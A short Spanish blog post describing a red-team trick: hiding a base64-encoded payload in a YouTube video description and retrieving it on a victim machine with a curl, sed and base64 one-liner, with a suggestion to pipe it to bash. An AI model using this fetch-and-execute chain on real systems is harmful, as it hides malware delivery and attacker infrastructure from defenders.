Payloads maliciosos en descripciones de vídeo de Youtube

Gambler nos hablaba de un ejercicio de Red Team en el que la máquina infectada mediante un Rubber Ducky iba a comunicarse con el servidor C2 a través de Google Translator, es decir, mediante la herramienta GTRS de una forma más o menos segura para el atacante. Sin embargo, para bajarse el payload de GTRS la máquina de la víctima tendría que comunicarse directamente con el C2 y por lo tanto desvelar su ubicación o identidad.

Para evitarlo, Gambler planteaba usar Youtube para hostear el payload y ejecutarlo en bash. No es que sea la "panacea", pero al fin y al cabo si una técnica bastante ingeniosa. Simplemente hay que generar el payload en python, powershell o el lenguaje que sea y encodearlo en base64:

$ echo 'malo malisimo' | base64
bWFsbyBtYWxpc2ltbwo=

Luego añadir el payload en la descripción de un video pero, para hacernos la vida más fácil, se agrega una etiqueta al comienzo y al final: sCmD[YOUPAYLOAD]eCmD 



Finalmente, todo lo que necesitamos es ejecutar el siguiente comando desde el Rubber Ducky o donde sea:

$ curl -s https://www.youtube.com/watch?v=peeWtBRV3DU | sed -n 's/.*sCmD\(.*\)eCmD.*/\1/p' | base64 -D 
malo malisimo

También podemos usar un acortador de URLs como bit.ly y si además añadimos '| bash' al final... boom!

Fuente: Hosting malicious payloads on Youtube

Comentarios